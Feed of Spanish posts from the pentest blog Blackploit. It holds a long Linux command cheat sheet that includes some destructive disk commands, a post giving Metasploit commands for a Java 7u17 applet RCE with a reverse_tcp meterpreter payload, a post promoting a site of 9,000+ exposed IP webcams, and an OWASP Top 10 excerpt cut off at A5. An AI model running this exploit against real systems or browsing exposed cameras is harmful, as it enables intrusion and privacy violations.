Blackploit [PenTest]

CheatSheet con 400 comandos para GNU/Linux que deberías saber

noreply@blogger.com (Zion3R) — Sat, 04 May 2013 15:42:04 PDT

Índice:

Información del sistema

arch: mostrar la arquitectura de la máquina (1).
uname -m: mostrar la arquitectura de la máquina (2).
uname -r: mostrar la versión del kernel usado.
dmidecode -q: mostrar los componentes (hardware) del sistema.
hdparm -i /dev/hda: mostrar las características de un disco duro.
hdparm -tT /dev/sda: realizar prueba de lectura en un disco duro.
cat /proc/cpuinfo: mostrar información de la CPU.
cat /proc/interrupts: mostrar las interrupciones.
cat /proc/meminfo: verificar el uso de memoria.
cat /proc/swaps: mostrar ficheros swap.
cat /proc/version: mostrar la versión del kernel.
cat /proc/net/dev: mostrar adaptadores de red y estadísticas.
cat /proc/mounts: mostrar el sistema de ficheros montado.
lspci -tv: mostrar los dispositivos PCI.
lsusb -tv: mostrar los dispositivos USB.
date: mostrar la fecha del sistema.
cal 2011: mostrar el almanaque de 2011.
cal 07 2011: mostrar el almanaque para el mes julio de 2011.
date 041217002011.00: colocar (declarar, ajustar) fecha y hora.
clock -w: guardar los cambios de fecha en la BIOS.

Apagar (Reiniciar Sistema o Cerrar Sesión)

shutdown -h now: apagar el sistema (1).
init 0: apagar el sistema (2).
telinit 0: apagar el sistema (3).
halt: apagar el sistema (4).
shutdown -h hours:minutes &: apagado planificado del sistema.
shutdown -c: cancelar un apagado planificado del sistema.
shutdown -r now: reiniciar (1).
reboot: reiniciar (2).
logout: cerrar sesión.

Archivos y Directorios

cd /home: entrar en el directorio “home”.
cd ..: retroceder un nivel.
cd ../..: retroceder 2 niveles.
cd: ir al directorio raíz.
cd ~user1: ir al directorio user1.
cd -: ir (regresar) al directorio anterior.
pwd: mostrar el camino del directorio de trabajo.
ls: ver los ficheros de un directorio.
ls -F: ver los ficheros de un directorio.
ls -l: mostrar los detalles de ficheros y carpetas de un directorio.
ls -a: mostrar los ficheros ocultos.
ls *[0-9]*: mostrar los ficheros y carpetas que contienen números.
tree: mostrar los ficheros y carpetas en forma de árbol comenzando por la raíz.(1)
lstree: mostrar los ficheros y carpetas en forma de árbol comenzando por la raíz.(2)
mkdir dir1: crear una carpeta o directorio con nombre ‘dir1?.
mkdir dir1 dir2: crear dos carpetas o directorios simultáneamente (Crear dos directorios a la vez).
mkdir -p /tmp/dir1/dir2: crear un árbol de directorios.
rm -f file1: borrar el fichero llamado ‘file1?.
rmdir dir1: borrar la carpeta llamada ‘dir1?.
rm -rf dir1: eliminar una carpeta llamada ‘dir1? con su contenido de forma recursiva. (Si lo borro recursivo estoy diciendo que es con su contenido).
rm -rf dir1 dir2: borrar dos carpetas (directorios) con su contenido de forma recursiva.
mv dir1 new_dir: renombrar o mover un fichero o carpeta (directorio).
cp file1: copiar un fichero.
cp file1 file2: copiar dos ficheros al unísono.
cp dir /* .: copiar todos los ficheros de un directorio dentro del directorio de trabajo actual.
cp -a /tmp/dir1 .: copiar un directorio dentro del directorio actual de trabajo.
cp -a dir1: copiar un directorio.
cp -a dir1 dir2: copiar dos directorio al unísono.
ln -s file1 lnk1: crear un enlace simbólico al fichero o directorio.
ln file1 lnk1: crear un enlace físico al fichero o directorio.
touch -t 0712250000 file1: modificar el tiempo real (tiempo de creación) de un fichero o directorio.
file file1: salida (volcado en pantalla) del tipo mime de un fichero texto.
iconv -l: listas de cifrados conocidos.
iconv -f fromEncoding -t toEncoding inputFile > outputFile: crea una nueva forma del fichero de entrada asumiendo que está codificado en fromEncoding y convirtiéndolo a ToEncoding.
find . -maxdepth 1 -name *.jpg -print -exec convert ”{}” -resize 80×60 “thumbs/{}” \;: agrupar ficheros redimensionados en el directorio actual y enviarlos a directorios en vistas de miniaturas (requiere convertir desde ImagemagicK).

Encontrar archivos

find / -name file1: buscar fichero y directorio a partir de la raíz del sistema.
find / -user user1: buscar ficheros y directorios pertenecientes al usuario ‘user1?.
find /home/user1 -name \*.bin: buscar ficheros con extensión ‘. bin’ dentro del directorio ‘/ home/user1?.
find /usr/bin -type f -atime +100: buscar ficheros binarios no usados en los últimos 100 días.
find /usr/bin -type f -mtime -10: buscar ficheros creados o cambiados dentro de los últimos 10 días.
find / -name \*.rpm -exec chmod 755 ‘{}’ \;: buscar ficheros con extensión ‘.rpm’ y modificar permisos.
find / -xdev -name \*.rpm: Buscar ficheros con extensión ‘.rpm’ ignorando los dispositivos removibles como cdrom, pen-drive, etc.…
locate \*.ps: encuentra ficheros con extensión ‘.ps’ ejecutados primeramente con el command ‘updatedb’.
whereis halt: mostrar la ubicación de un fichero binario, de ayuda o fuente. En este caso pregunta dónde está el comando ‘halt’.
which halt: mostrar la senda completa (el camino completo) a un binario / ejecutable.

Montando un sistema de ficheros

mount /dev/hda2 /mnt/hda2: montar un disco llamado hda2. Verifique primero la existencia del directorio ‘/ mnt/hda2?; si no está, debe crearlo.
umount /dev/hda2: desmontar un disco llamado hda2. Salir primero desde el punto ‘/ mnt/hda2.
fuser -km /mnt/hda2: forzar el desmontaje cuando el dispositivo está ocupado.
umount -n /mnt/hda2: correr el desmontaje sin leer el fichero /etc/mtab. Útil cuando el fichero es de solo lectura o el disco duro está lleno.
mount /dev/fd0 /mnt/floppy: montar un disco flexible (floppy).
mount /dev/cdrom /mnt/cdrom: montar un cdrom / dvdrom.
mount /dev/hdc /mnt/cdrecorder: montar un cd regrabable o un dvdrom.
mount /dev/hdb /mnt/cdrecorder: montar un cd regrabable / dvdrom (un dvd).
mount -o loop file.iso /mnt/cdrom: montar un fichero o una imagen iso.
mount -t vfat /dev/hda5 /mnt/hda5: montar un sistema de ficheros FAT32.
mount /dev/sda1 /mnt/usbdisk: montar un usb pen-drive o una memoria (sin especificar el tipo de sistema de ficheros).

Espacio de Disco

df -h: mostrar una lista de las particiones montadas.
ls -lSr |more: mostrar el tamaño de los ficheros y directorios ordenados por tamaño.
du -sh dir1: Estimar el espacio usado por el directorio ‘dir1?.
du -sk * | sort -rn: mostrar el tamaño de los ficheros y directorios ordenados por tamaño.
rpm -q -a –qf ‘%10{SIZE}t%{NAME}n’ | sort -k1,1n: mostrar el espacio usado por los paquetes rpm instalados organizados por tamaño (Fedora, Redhat y otros).
dpkg-query -W -f=’${Installed-Size;10}t${Package}n’ | sort -k1,1n: mostrar el espacio usado por los paquetes instalados, organizados por tamaño (Ubuntu, Debian y otros).

Usuarios y Grupos

groupadd nombre_del_grupo: crear un nuevo grupo.
groupdel nombre_del_grupo: borrar un grupo.
groupmod -n nuevo_nombre_del_grupo viejo_nombre_del_grupo: renombrar un grupo.
useradd -c “Name Surname ” -g admin -d /home/user1 -s /bin/bash user1: Crear un nuevo usuario perteneciente al grupo “admin”.
useradd user1: crear un nuevo usuario.
userdel -r user1: borrar un usuario (‘-r’ elimina el directorio Home).
usermod -c “User FTP” -g system -d /ftp/user1 -s /bin/nologin user1: cambiar los atributos del usuario.
passwd: cambiar contraseña.
passwd user1: cambiar la contraseña de un usuario (solamente por root).
chage -E 2011-12-31 user1: colocar un plazo para la contraseña del usuario. En este caso dice que la clave expira el 31 de diciembre de 2011.
pwck: chequear la sintaxis correcta el formato de fichero de ‘/etc/passwd’ y la existencia de usuarios.
grpck: chequear la sintaxis correcta y el formato del fichero ‘/etc/group’ y la existencia de grupos.
newgrp group_name: registra a un nuevo grupo para cambiar el grupo predeterminado de los ficheros creados recientemente.

Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)

ls -lh: Mostrar permisos.
ls /tmp | pr -T5 -W$COLUMNS: dividir la terminal en 5 columnas.
chmod ugo+rwx directory1: colocar permisos de lectura ®, escritura (w) y ejecución(x) al propietario (u), al grupo (g) y a otros (o) sobre el directorio ‘directory1?.
chmod go-rwx directory1: quitar permiso de lectura ®, escritura (w) y (x) ejecución al grupo (g) y otros (o) sobre el directorio ‘directory1?.
chown user1 file1: cambiar el dueño de un fichero.
chown -R user1 directory1: cambiar el propietario de un directorio y de todos los ficheros y directorios contenidos dentro.
chgrp group1 file1: cambiar grupo de ficheros.
chown user1:group1 file1: cambiar usuario y el grupo propietario de un fichero.
find / -perm -u+s: visualizar todos los ficheros del sistema con SUID configurado.
chmod u+s /bin/file1: colocar el bit SUID en un fichero binario. El usuario que corriendo ese fichero adquiere los mismos privilegios como dueño.
chmod u-s /bin/file1: deshabilitar el bit SUID en un fichero binario.
chmod g+s /home/public: colocar un bit SGID en un directorio –similar al SUID pero por directorio.
chmod g-s /home/public: desabilitar un bit SGID en un directorio.
chmod o+t /home/public: colocar un bit STIKY en un directorio. Permite el borrado de ficheros solamente a los dueños legítimos.
chmod o-t /home/public: desabilitar un bit STIKY en un directorio.

Atributos especiales en ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)

chattr +a file1: permite escribir abriendo un fichero solamente modo append.
chattr +c file1: permite que un fichero sea comprimido / descomprimido automaticamente.
chattr +d file1: asegura que el programa ignore borrar los ficheros durante la copia de seguridad.
chattr +i file1: convierte el fichero en invariable, por lo que no puede ser eliminado, alterado, renombrado, ni enlazado.
chattr +s file1: permite que un fichero sea borrado de forma segura.
chattr +S file1: asegura que un fichero sea modificado, los cambios son escritos en modo synchronous como con sync.
chattr +u file1: te permite recuperar el contenido de un fichero aún si este está cancelado.
lsattr: mostrar atributos especiales.

Archivos y Ficheros comprimidos

bunzip2 file1.bz2: descomprime in fichero llamado ‘file1.bz2?.
bzip2 file1: comprime un fichero llamado ‘file1?.
gunzip file1.gz: descomprime un fichero llamado ‘file1.gz’.
gzip file1: comprime un fichero llamado ‘file1?.
gzip -9 file1: comprime con compresión máxima.
rar a file1.rar test_file: crear un fichero rar llamado ‘file1.rar’.
rar a file1.rar file1 file2 dir1: comprimir ‘file1?, ‘file2? y ‘dir1? simultáneamente.
rar x file1.rar: descomprimir archivo rar.
unrar x file1.rar: descomprimir archivo rar.
tar -cvf archive.tar file1: crear un tarball descomprimido.
tar -cvf archive.tar file1 file2 dir1: crear un archivo conteniendo ‘file1?, ‘file2? y’dir1?.
tar -tf archive.tar: mostrar los contenidos de un archivo.
tar -xvf archive.tar: extraer un tarball.
tar -xvf archive.tar -C /tmp: extraer un tarball en / tmp.
tar -cvfj archive.tar.bz2 dir1: crear un tarball comprimido dentro de bzip2.
tar -xvfj archive.tar.bz2: descomprimir un archivo tar comprimido en bzip2
tar -cvfz archive.tar.gz dir1: crear un tarball comprimido en gzip.
tar -xvfz archive.tar.gz: descomprimir un archive tar comprimido en gzip.
zip file1.zip file1: crear un archivo comprimido en zip.
zip -r file1.zip file1 file2 dir1: comprimir, en zip, varios archivos y directorios de forma simultánea.
unzip file1.zip: descomprimir un archivo zip.

Paquetes RPM (Red Hat, Fedora y similares)

rpm -ivh package.rpm: instalar un paquete rpm.
rpm -ivh –nodeeps package.rpm: instalar un paquete rpm ignorando las peticiones de dependencias.
rpm -U package.rpm: actualizar un paquete rpm sin cambiar la configuración de los ficheros.
rpm -F package.rpm: actualizar un paquete rpm solamente si este está instalado.
rpm -e package_name.rpm: eliminar un paquete rpm.
rpm -qa: mostrar todos los paquetes rpm instalados en el sistema.
rpm -qa | grep httpd: mostrar todos los paquetes rpm con el nombre “httpd”.
rpm -qi package_name: obtener información en un paquete específico instalado.
rpm -qg “System Environment/Daemons”: mostar los paquetes rpm de un grupo software.
rpm -ql package_name: mostrar lista de ficheros dados por un paquete rpm instalado.
rpm -qc package_name: mostrar lista de configuración de ficheros dados por un paquete rpm instalado.
rpm -q package_name –whatrequires: mostrar lista de dependencias solicitada para un paquete rpm.
rpm -q package_name –whatprovides: mostar la capacidad dada por un paquete rpm.
rpm -q package_name –scripts: mostrar los scripts comenzados durante la instalación /eliminación.
rpm -q package_name –changelog: mostar el historial de revisions de un paquete rpm.
rpm -qf /etc/httpd/conf/httpd.conf: verificar cuál paquete rpm pertenece a un fichero dado.
rpm -qp package.rpm -l: mostrar lista de ficheros dados por un paquete rpm que aún no ha sido instalado.
rpm –import /media/cdrom/RPM-GPG-KEY: importar la firma digital de la llave pública.
rpm –checksig package.rpm: verificar la integridad de un paquete rpm.
rpm -qa gpg-pubkey: verificar la integridad de todos los paquetes rpm instalados.
rpm -V package_name: chequear el tamaño del fichero, licencias, tipos, dueño, grupo, chequeo de resumen de MD5 y última modificación.
rpm -Va: chequear todos los paquetes rpm instalados en el sistema. Usar con cuidado.
rpm -Vp package.rpm: verificar un paquete rpm no instalado todavía.
rpm2cpio package.rpm | cpio –extract –make-directories *bin*: extraer fichero ejecutable desde un paquete rpm.
rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: instalar un paquete construido desde una fuente rpm.
rpmbuild –rebuild package_name.src.rpm: construir un paquete rpm desde una fuente rpm.

Actualizador de paquetes YUM (Red Hat, Fedora y similares)

yum install package_name: descargar e instalar un paquete rpm.
yum localinstall package_name.rpm: este instalará un RPM y tratará de resolver todas las dependencies para ti, usando tus repositorios.
yum update package_name.rpm: actualizar todos los paquetes rpm instalados en el sistema.
yum update package_name: modernizar / actualizar un paquete rpm.
yum remove package_name: eliminar un paquete rpm.
yum list: listar todos los paquetes instalados en el sistema.
yum search package_name: Encontrar un paquete en repositorio rpm.
yum clean packages: limpiar un caché rpm borrando los paquetes descargados.
yum clean headers: eliminar todos los ficheros de encabezamiento que el sistema usa para resolver la dependencia.
yum clean all: eliminar desde los paquetes caché y ficheros de encabezado.

Paquetes Deb (Debian, Ubuntu y derivados)

dpkg -i package.deb: instalar / actualizar un paquete deb.
dpkg -r package_name: eliminar un paquete deb del sistema.
dpkg -l: mostrar todos los paquetes deb instalados en el sistema.
dpkg -l | grep httpd: mostrar todos los paquetes deb con el nombre “httpd”
dpkg -s package_name: obtener información en un paquete específico instalado en el sistema.
dpkg -L package_name: mostar lista de ficheros dados por un paquete instalado en el sistema.
dpkg –contents package.deb: mostrar lista de ficheros dados por un paquete no instalado todavía.
dpkg -S /bin/ping: verificar cuál paquete pertenece a un fichero dado.

Actualizador de paquetes APT (Debian, Ubuntu y derivados)

apt-get install package_name: instalar / actualizar un paquete deb.
apt-cdrom install package_name: instalar / actualizar un paquete deb desde un cdrom.
apt-get update: actualizar la lista de paquetes.
apt-get upgrade: actualizar todos los paquetes instalados.
apt-get remove package_name: eliminar un paquete deb del sistema.
apt-get check: verificar la correcta resolución de las dependencias.
apt-get clean: limpiar cache desde los paquetes descargados.
apt-cache search searched-package: retorna lista de paquetes que corresponde a la serie «paquetes buscados».

Ver el contenido de un fichero

cat file1: ver los contenidos de un fichero comenzando desde la primera hilera.
tac file1: ver los contenidos de un fichero comenzando desde la última línea.
more file1: ver el contenido a lo largo de un fichero.
less file1: parecido al commando ‘more’ pero permite salvar el movimiento en el fichero así como el movimiento hacia atrás.
head -2 file1: ver las dos primeras líneas de un fichero.
tail -2 file1: ver las dos últimas líneas de un fichero.
tail -f /var/log/messages: ver en tiempo real qué ha sido añadido al fichero.

Manipulación de texto

cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: sintaxis general para la manipulación de texto utilizando PIPE, STDIN y STDOUT.
cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: sintaxis general para manipular un texto de un fichero y escribir el resultado en un fichero nuevo.
cat file1 | command( sed, grep, awk, grep, etc…) » result.txt: sintaxis general para manipular un texto de un fichero y añadir resultado en un fichero existente.
grep Aug /var/log/messages: buscar palabras “Aug” en el fichero ‘/var/log/messages’.
grep ^Aug /var/log/messages: buscar palabras que comienzan con “Aug” en fichero ‘/var/log/messages’
grep [0-9] /var/log/messages: seleccionar todas las líneas del fichero ‘/var/log/messages’ que contienen números.
grep Aug -R /var/log/*: buscar la cadena “Aug” en el directorio ‘/var/log’ y debajo.
sed ‘s/stringa1/stringa2/g’ example.txt: reubicar “string1” con “string2” en ejemplo.txt
sed ‘/^$/d’ example.txt: eliminar todas las líneas en blanco desde el ejemplo.txt
sed ‘/ *#/d; /^$/d’ example.txt: eliminar comentarios y líneas en blanco de ejemplo.txt
echo ‘esempio’ | tr ‘[:lower:]‘ ‘[:upper:]‘: convertir minúsculas en mayúsculas.
sed -e ’1d’ result.txt: elimina la primera línea del fichero ejemplo.txt
sed -n ‘/stringa1/p’: visualizar solamente las líneas que contienen la palabra “string1”.

Establecer caracter y conversión de ficheros

dos2unix filedos.txt fileunix.txt: convertir un formato de fichero texto desde MSDOS a UNIX.
unix2dos fileunix.txt filedos.txt: convertir un formato de fichero de texto desde UNIX a MSDOS.
recode ..HTML < page.txt > page.html: convertir un fichero de texto en html.
recode -l | more: mostrar todas las conversiones de formato disponibles.

Análisis del sistema de ficheros

badblocks -v /dev/hda1: Chequear los bloques defectuosos en el disco hda1.
fsck /dev/hda1: reparar / chequear la integridad del fichero del sistema Linux en el disco hda1.
fsck.ext2 /dev/hda1: reparar / chequear la integridad del fichero del sistema ext 2 en el disco hda1.
e2fsck /dev/hda1: reparar / chequear la integridad del fichero del sistema ext 2 en el disco hda1.
e2fsck -j /dev/hda1: reparar / chequear la integridad del fichero del sistema ext 3 en el disco hda1.
fsck.ext3 /dev/hda1: reparar / chequear la integridad del fichero del sistema ext 3 en el disco hda1.
fsck.vfat /dev/hda1: reparar / chequear la integridad del fichero sistema fat en el disco hda1.
fsck.msdos /dev/hda1: reparar / chequear la integridad de un fichero del sistema dos en el disco hda1.
dosfsck /dev/hda1: reparar / chequear la integridad de un fichero del sistema dos en el disco hda1.

Formatear un sistema de ficheros

mkfs /dev/hda1: crear un fichero de sistema tipo Linux en la partición hda1.
mke2fs /dev/hda1: crear un fichero de sistema tipo Linux ext 2 en hda1.
mke2fs -j /dev/hda1: crear un fichero de sistema tipo Linux ext3 (periódico) en la partición hda1.
mkfs -t vfat 32 -F /dev/hda1: crear un fichero de sistema FAT32 en hda1.
fdformat -n /dev/fd0: formatear un disco flooply.
mkswap /dev/hda3: crear un fichero de sistema swap.

Trabajo con la SWAP

mkswap /dev/hda3: crear fichero de sistema swap.
swapon /dev/hda3: activando una nueva partición swap.
swapon /dev/hda2 /dev/hdb3: activar dos particiones swap.

Salvas (Backup)

dump -0aj -f /tmp/home0.bak /home: hacer una salva completa del directorio ‘/home’.
dump -1aj -f /tmp/home0.bak /home: hacer una salva incremental del directorio ‘/home’.
restore -if /tmp/home0.bak: restaurando una salva interactivamente.
rsync -rogpav –delete /home /tmp: sincronización entre directorios.
rsync -rogpav -e ssh –delete /home ip_address:/tmp: rsync a través del túnel SSH.
rsync -az -e ssh –delete ip_addr:/home/public /home/local: sincronizar un directorio local con un directorio remoto a través de ssh y de compresión.
rsync -az -e ssh –delete /home/local ip_addr:/home/public: sincronizar un directorio remoto con un directorio local a través de ssh y de compresión.
dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr ‘dd of=hda.gz’: hacer una salva de un disco duro en un host remoto a través de ssh.
dd if=/dev/sda of=/tmp/file1: salvar el contenido de un disco duro a un fichero. (En este caso el disco duro es “sda” y el fichero “file1”).
tar -Puf backup.tar /home/user: hacer una salva incremental del directorio ‘/home/user’.
( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr ‘cd /home/share/ && tar x -p’: copiar el contenido de un directorio en un directorio remoto a través de ssh.
( tar c /home ) | ssh -C user@ip_addr ‘cd /home/backup-home && tar x -p’: copiar un directorio local en un directorio remoto a través de ssh.
tar cf – . | (cd /tmp/backup ; tar xf – ): copia local conservando las licencias y enlaces desde un directorio a otro.
find /home/user1 -name ‘*.txt’ | xargs cp -av –target-directory=/home/backup/ –parents: encontrar y copiar todos los ficheros con extensión ‘.txt’ de un directorio a otro.
find /var/log -name ‘*.log’ | tar cv –files-from=- | bzip2 > log.tar.bz2: encontrar todos los ficheros con extensión ‘.log’ y hacer un archivo bzip.
dd if=/dev/hda of=/dev/fd0 bs=512 count=1: hacer una copia del MRB (Master Boot Record) a un disco floppy.
dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restaurar la copia del MBR (Master Boot Record) salvada en un floppy.

CD-ROM

cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: limpiar o borrar un cd regrabable.
mkisofs /dev/cdrom > cd.iso: crear una imagen iso de cdrom en disco.
mkisofs /dev/cdrom | gzip > cd_iso.gz: crear una imagen comprimida iso de cdrom en disco.
mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd: crear una imagen iso de un directorio.
cdrecord -v dev=/dev/cdrom cd.iso: quemar una imagen iso.
gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: quemar una imagen iso comprimida.
mount -o loop cd.iso /mnt/iso: montar una imagen iso.
cd-paranoia -B: llevar canciones de un cd a ficheros wav.
cd-paranoia – ”-3”: llevar las 3 primeras canciones de un cd a ficheros wav.
cdrecord –scanbus: escanear bus para identificar el canal scsi.
dd if=/dev/hdc | md5sum: hacer funcionar un md5sum en un dispositivo, como un CD.

Trabajo con la RED ( LAN y Wi-Fi)

ifconfig eth0: mostrar la configuración de una tarjeta de red Ethernet.
ifup eth0: activar una interface ‘eth0?.
ifdown eth0: deshabilitar una interface ‘eth0?.
ifconfig eth0 192.168.1.1 netmask 255.255.255.0: configurar una dirección IP.
ifconfig eth0 promisc: configurar ‘eth0?en modo común para obtener los paquetes (sniffing).
dhclient eth0: activar la interface ‘eth0? en modo dhcp.
route -n: mostrar mesa de recorrido.
route add -net 0/0 gw IP_Gateway: configurar entrada predeterminada.
route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1: configurar ruta estática para buscar la red ’192.168.0.0/16?.
route del 0/0 gw IP_gateway: eliminar la ruta estática.
echo “1” > /proc/sys/net/ipv4/ip_forward: activar el recorrido ip.
hostname: mostrar el nombre del host del sistema.
host www.example.com: buscar el nombre del host para resolver el nombre a una dirección ip(1).
nslookup www.example.com: buscar el nombre del host para resolver el nombre a una direccióm ip y viceversa(2).
ip link show: mostar el estado de enlace de todas las interfaces.
mii-tool eth0: mostar el estado de enlace de ‘eth0?.
ethtool eth0: mostrar las estadísticas de tarjeta de red ‘eth0?.
netstat -tup: mostrar todas las conexiones de red activas y sus PID.
netstat -tupl: mostrar todos los servicios de escucha de red en el sistema y sus PID.
tcpdump tcp port 80: mostrar todo el tráfico HTTP.
iwlist scan: mostrar las redes inalámbricas.
iwconfig eth1: mostrar la configuración de una tarjeta de red inalámbrica.
whois www.example.com: buscar en base de datos Whois.

Redes de Microsoft Windows (SAMBA)

nbtscan ip_addr: resolución de nombre de red bios.
nmblookup -A ip_addr: resolución de nombre de red bios.
smbclient -L ip_addr/hostname: mostrar acciones remotas de un host en windows.

Tablas IP (CORTAFUEGOS)

iptables -t filter -L: mostrar todas las cadenas de la tabla de filtro.
iptables -t nat -L: mostrar todas las cadenas de la tabla nat.
iptables -t filter -F: limpiar todas las reglas de la tabla de filtro.
iptables -t nat -F: limpiar todas las reglas de la tabla nat.
iptables -t filter -X: borrar cualquier cadena creada por el usuario.
iptables -t filter -A INPUT -p tcp –dport telnet -j ACCEPT: permitir las conexiones telnet para entar.
iptables -t filter -A OUTPUT -p tcp –dport http -j DROP: bloquear las conexiones HTTP para salir.
iptables -t filter -A FORWARD -p tcp –dport pop3 -j ACCEPT: permitir las conexiones POP a una cadena delantera.
iptables -t filter -A INPUT -j LOG –log-prefix “DROP INPUT”: registrando una cadena de entrada.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configurar un PAT (Puerto de traducción de dirección) en eth0, ocultando los paquetes de salida forzada.
iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp –dport 22 -j DNAT –to-destination 10.0.0.2:22: redireccionar los paquetes diriguidos de un host a otro.

Monitoreando y depurando

top: mostrar las tareas de linux usando la mayoría cpu.
ps -eafw: muestra las tareas Linux.
ps -e -o pid,args –forest: muestra las tareas Linux en un modo jerárquico.
pstree: mostrar un árbol sistema de procesos.
kill -9 ID_Processo: forzar el cierre de un proceso y terminarlo.
kill -1 ID_Processo: forzar un proceso para recargar la configuración.
lsof -p $$: mostrar una lista de ficheros abiertos por procesos.
lsof /home/user1: muestra una lista de ficheros abiertos en un camino dado del sistema.
strace -c ls >/dev/null: mostrar las llamadas del sistema hechas y recibidas por un proceso.
strace -f -e open ls >/dev/null: mostrar las llamadas a la biblioteca.
watch -n1 ‘cat /proc/interrupts’: mostrar interrupciones en tiempo real.
last reboot: mostrar historial de reinicio.
lsmod: mostrar el kernel cargado.
free -m: muestra el estado de la RAM en megabytes.
smartctl -A /dev/hda: monitorear la fiabilidad de un disco duro a través de SMART.
smartctl -i /dev/hda: chequear si SMART está activado en un disco duro.
tail /var/log/dmesg: mostrar eventos inherentes al proceso de carga del kernel.
tail /var/log/messages: mostrar los eventos del sistema.

Otros comandos útiles

apropos …keyword: mostrar una lista de comandos que pertenecen a las palabras claves de un programa; son útiles cuando tú sabes qué hace tu programa, pero de sconoces el nombre del comando.
man ping: mostrar las páginas del manual on-line; por ejemplo, en un comando ping, usar la opción ‘-k’ para encontrar cualquier comando relacionado.
whatis …keyword: muestra la descripción de lo que hace el programa.
mkbootdisk –device /dev/fd0 `uname -r`: crear un floppy boteable.
gpg -c file1: codificar un fichero con guardia de seguridad GNU.
gpg file1.gpg: decodificar un fichero con Guardia de seguridad GNU.
wget -r www.example.com: descargar un sitio web completo.
wget -c www.example.com/file.iso: descargar un fichero con la posibilidad de parar la descargar y reanudar más tarde.
echo ‘wget -c www.example.com/files.iso‘ | at 09:00: Comenzar una descarga a cualquier hora. En este caso empezaría a las 9 horas.
ldd /usr/bin/ssh: mostrar las bibliotecas compartidas requeridas por el programa ssh.
alias hh=’history’: colocar un alias para un commando –hh= Historial.
chsh: cambiar el comando Shell.
chsh –list-shells: es un comando adecuado para saber si tienes que hacer remoto en otra terminal.
who -a: mostrar quien está registrado, e imprimir hora del último sistema de importación, procesos muertos, procesos de registro de sistema, procesos activos producidos por init, funcionamiento actual y últimos cambios del reloj del sistema.

Fuente: http://gutl.jovenclub.cu/

Nuevo Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]

noreply@blogger.com (Zion3R) — Sat, 20 Apr 2013 12:17:13 PDT

Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores.

Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.

Aquí les dejo un video con la explotación con Metasploit:

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Fuente y Video: http://eromang.zataz.com/

El Reality Show del Mundo Real - Más de 9 mil cámaras IP expuestas

noreply@blogger.com (Zion3R) — Fri, 12 Apr 2013 14:02:10 PDT

Recién estuve leyendo un artículo y presentación de Adrian Hayter en el que expone la facilidad con la cual se puede acceder a Webcams IP (que simplemente están libres en Internet) y cómo con una simple búsqueda en SHODAN podemos entretenernos viendo muchas cámara IP de cualquier parte del mundo. Les recomiendo que vean la presentación en la que pone con que tipos de cosas se encontró escudriñando por tantas cámaras (interiores de casas, clubes nocturnos, piezas con servidores, tiendas, etc...).

Bueno, el punto es que Adrian Hayter se dio el tiempo y trabajo de crear una plataforma web con todas las cámaras IP expuestas que ha encontrado por diferentes métodos y hasta el momento van 9,258 Webcams, un número bastante grande y que va en aumento.

La plataforma web está muy bien lograda y nos muestra 16 Webcams simultáneamente por página (con un total de 579 páginas hasta el momento), además le agregó geolocalización para saber de que parte del mundo es tal cámara, con un sólo click se va a la webcam seleccionada y muestra país, ciudad, Latitud y longitud.

Pues bueno, no deja de ser muy preocupante, pero sin duda hará que más de alguno pierda un poco de tiempo buscando algo interesante (y es muy probable que lo haya).

Sin más que decir, les dejo con la web en rigor:

Recopilación de más de 9 mil Webcams IP Expuestas

OWASP Top 10 2013 - Las 10 vulnerabilidades más Críticas

noreply@blogger.com (Zion3R) — Thu, 04 Apr 2013 12:02:19 PDT

OWASP Top 10 es un proyecto dedicado a recopilar las vulnerabilidades más riesgosas para la seguridad de nuestras aplicaciones web.

El objetivo del proyecto Top 10 es crear conciencia acerca de la seguridad de las aplicaciones web mediante la identificación de algunos de los riesgos más críticos que enfrentan las organizaciones.

A medida que nuestra infraestructura digital crece, se hace cada vez más complejo lograr la seguridad total de las aplicaciones web. Diariamente hay muchos ataques cibernéticos y ya no nos podemos dar el lujo de tolerar los problemas de seguridad como los que se presentan en este OWASP Top 10.

A continuación les dejo la OWASP Top 10 2013:

A1-Injection	Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
A2–Broken Authentication and Session Management	Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.
A3–Cross-Site Scripting (XSS)	XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A4–Insecure Direct Object References	A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
A5–Security Misconfiguration	Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.
